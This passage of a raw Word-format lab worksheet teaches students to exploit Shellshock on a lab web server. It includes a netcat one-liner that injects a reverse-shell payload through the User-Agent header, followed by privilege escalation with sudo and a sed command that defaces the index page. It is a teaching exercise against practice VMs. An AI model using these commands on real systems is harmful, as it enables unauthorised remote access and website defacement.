      </w:r>
    </w:p>
    <w:p w14:paraId="61D66D9B" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="4575F6EA" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:trPr>
          <w:trHeight w:val="530"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A37B05E" w14:textId="0CF7E7D4" w:rsidR="00BB3A74" w:rsidRPr="00A17BF9" w:rsidRDefault="00BB3A74" w:rsidP="00845FE2">
            <w:r w:rsidRPr="00A17BF9">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc </w:t>
            </w:r>
            <w:r w:rsidRPr="00A17BF9">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>[PenTest_IP]</w:t>
            </w:r>
            <w:r w:rsidRPr="00A17BF9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A17BF9">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" </w:t>
            </w:r>
            <w:r w:rsidR="005C247E">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>| nc 192.168.64.210</w:t>
            </w:r>
            <w:r w:rsidRPr="00A17BF9">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44AFA5EF" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217D8B7B" w14:textId="0D1495BF" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The unix pipeline operator </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> chains multiple commands together.  We’re taking the output of the echo command (which would normally be printing what we just wrote) and piping it into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> command running on the local pentesting workstation.   We pass the ip address of the target web server </w:t>
      </w:r>
      <w:r w:rsidR="005C247E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(192.168.64.210) </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to NC in order </w:t>
      </w:r>
      <w:r w:rsidR="005C247E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">pass the exploit string to the server which, if successful, proves </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the vulnerability.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685CB65D" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677E4A31" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>That was a lot of kung fu, but the end result is that the webserver wi</w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ll receive a series of packets.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1F432" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CCEEF8" w14:textId="1B737869" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB4695" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When the sever processes them, it will </w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>conne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ct back to our pentesting workstation</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, giving us a shell that we can execute commands against.  We are ready to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>check if our attack worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF86A20" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037621F4" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C12C9" w14:textId="37DF1003" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute commands on the server!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E397598" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D613A7B" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Go back to the NC listener terminal from step 2 and type the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D810A" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E7169" w14:textId="4F4CB081" w:rsidR="00BB4695" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>If it says uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab), you have successfully executed a command on the server</w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>You just hacked into the server!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC2EF7" w14:textId="77777777" w:rsidR="00BB4695" w:rsidRDefault="00BB4695" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1C15F5" w14:textId="6461A322" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>This proves the vulnerability, but you need something a little more permanent to prove the vulnerability to the developer.  Let’s deface the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138309C2" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251A2255" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Exploit the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3DBF6" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073A5858" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Go back to the NC Listener terminal from step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BD1B4" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188C6E6" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>response: pentesterlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67433D98" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Let’s check who owns index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EDA78" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ls -alk /var/www/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FF6CC" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">response: -rwxr-xr-x    1 root     root          1704 Sep </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>25  2014</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111BDBB6" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>It’s root!  We need to get root privileges.  Let’s see if we can sudo up to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8824C" w14:textId="13CEF11F" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="002475CC" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>udo –s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B8BC1" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D458D" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>response: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69121547" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C72393" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>now let’s modify the index.html file</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add evidence of our successful compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACB5FC" w14:textId="3EBC0013" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We’re going to add a button to the web page that you can write your name on- and then we’ll add an image to the page that makes it obvious that the site was vulnerable.  You can copy and paste parts of this command from the </w:t>
      </w:r>
      <w:r w:rsidR="00686C68">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>trickserver2.sh file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D85BD4C" w14:textId="04403301" w:rsidR="00686C68" w:rsidRPr="00686C68" w:rsidRDefault="00686C68" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686C68">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>more trickserver2.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC503D" w14:textId="77777777" w:rsidR="00686C68" w:rsidRDefault="00686C68" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Highlight the line you see below from the file, right click &amp; select copy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64321238" w14:textId="37FF1318" w:rsidR="00BB3A74" w:rsidRPr="00686C68" w:rsidRDefault="00BB3A74" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686C68">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i '60i&lt;button&gt;[YOURNAME] WAS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00686C68">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>HERE!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00686C68">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>img src="http://192.168.64.10/defcon.gif" height="548" width="972"&gt;&lt;/button&gt;' /var/www/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1E52D" w14:textId="6623D6A2" w:rsidR="00BB3A74" w:rsidRDefault="00686C68" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Right click on the command line &amp; select Paste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795BA96" w14:textId="4CDC7E8E" w:rsidR="00686C68" w:rsidRDefault="00686C68" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Use your left arrow key to go back and change [YOURNAME] to your name!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDE7A6" w14:textId="0D556B72" w:rsidR="00686C68" w:rsidRPr="00686C68" w:rsidRDefault="00686C68" w:rsidP="00686C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hit [enter]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203B101" w14:textId="77777777" w:rsidR="00686C68" w:rsidRPr="00993E9F" w:rsidRDefault="00686C68" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF1F2B3" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let’s confirm that we modified the web page:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8808A" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Open up iceweasel on the pentester vm.  It’s the purple/white icon in the top left of the Ubuntu side-bar.  You could also open a new terminal and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1967FADD" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450FA3C3" w14:textId="3E9D8A6A" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="005C247E" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>iceweasel 192.168.64.2</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00993E9F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A4184" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188017FB" w14:textId="0510CB20" w:rsidR="00BB3A74" w:rsidRPr="00993E9F" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll down and observe your tagging on the website.  </w:t>
      </w:r>
      <w:r w:rsidR="00E474A1">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Congratulations!  </w:t>
      </w:r>
      <w:r w:rsidR="00374D4F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">You successfully compromised the webserver.  You obtained shell access to the web server and made a slight modification to the web page, proving the vulnerability.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00993E9F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Now’s a good time to email the boss!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC6AB32" w14:textId="77777777" w:rsidR="00335746" w:rsidRDefault="00335746" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC1F700" w14:textId="77777777" w:rsidR="00CA5B55" w:rsidRDefault="00CA5B55" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300E5F5F" w14:textId="483DC73A" w:rsidR="00CA5B55" w:rsidRPr="00993E9F" w:rsidRDefault="00CA5B55" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>You’ve finished part 2</w:t>
      </w:r>
    </w:p>
